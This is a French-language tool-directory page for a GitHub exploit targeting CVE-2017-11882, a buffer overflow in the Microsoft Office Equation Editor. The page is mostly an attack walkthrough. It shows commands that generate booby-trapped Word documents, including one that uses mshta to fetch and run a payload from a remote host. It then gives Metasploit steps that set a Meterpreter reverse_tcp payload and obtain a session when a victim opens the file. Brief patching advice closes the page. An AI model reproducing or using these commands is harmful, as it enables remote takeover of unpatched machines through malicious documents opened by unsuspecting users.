Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2017-11882 — CVE-2017-11882(通杀Office 2003到2016) | Kitploit
Outils/GitHubGitHub/littlebin404/cve-2017-11882
Exploit FrameworksPayload GenerationVulnerability AnalysisExploitationPenetration TestingBinary Exploitation
GitHublittlebin404/cve-2017-11882

CVE-2017-11882

CVE-2017-11882(通杀Office 2003到2016)

Voir le dépôt
53il y a 5 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Aperçu de CVE-2017-11882

Du point de vue de l'exploitation, il peut toucher toutes les versions d'Office de 2003 à 2016, et la mise en place de l'environnement d'attaque est très simple. Cette vulnérabilité est causée par l'[Éditeur d'équations] dans Office. Comme le processus de l'éditeur ne vérifie pas la longueur des noms, cela provoque un débordement de tampon, et un attaquant peut exécuter du code arbitraire en construisant des caractères spéciaux. Par exemple, si un pirate exploite cette vulnérabilité pour créer un fichier Office avec une backdoor shell, lorsque l'utilisateur ordinaire ouvre ce fichier, l'ordinateur peut être directement contrôlé par le pirate.

Versions affectées :

root@kitploit:~
office 2003 
office 2007 
office 2010 
office 2013 
office 2016

Usage

root@kitploit:~
python Command_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o test.doc

Image

Cliquez sur le fichier "test.doc" généré, la calculatrice apparaît avec succès.

root@kitploit:~
python Command_CVE-2017-11882.py -c "mshta http://192.168.43.165:8080/11882" -o 11882-3.doc

Image

Image

Génération réussie du fichier Word 11882-3.doc.

Placez le fichier cve_2017_11882.rb dans le répertoire /usr/share/metasploit-framework/modules/exploits/windows/smb :

root@kitploit:~
msf > search CVE-2017-11882
msf > use exploit/windows/smb/CVE-2017-11882 
msf exploit(CVE-2017-11882) > set payload windows/meterpreter/reverse_tcp 
msf exploit(CVE-2017-11882) > set lhost 192.168.43.165 
msf exploit(CVE-2017-11882) > set uripath 11882 
msf exploit(CVE-2017-11882) > exploit

Démarrage de l'écoute :

Image

Cliquez sur le fichier 11882-3.doc sur la machine cible Windows 7, la session est obtenue avec succès !

Image

Correction de la vulnérabilité

① Mise à jour en ligne : activez Windows Update, cela suffit pour la plupart des gens. ② Appliquer le correctif : l'adresse du correctif Microsoft correspondant à cette vulnérabilité : https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-11882

Télécharger l’outil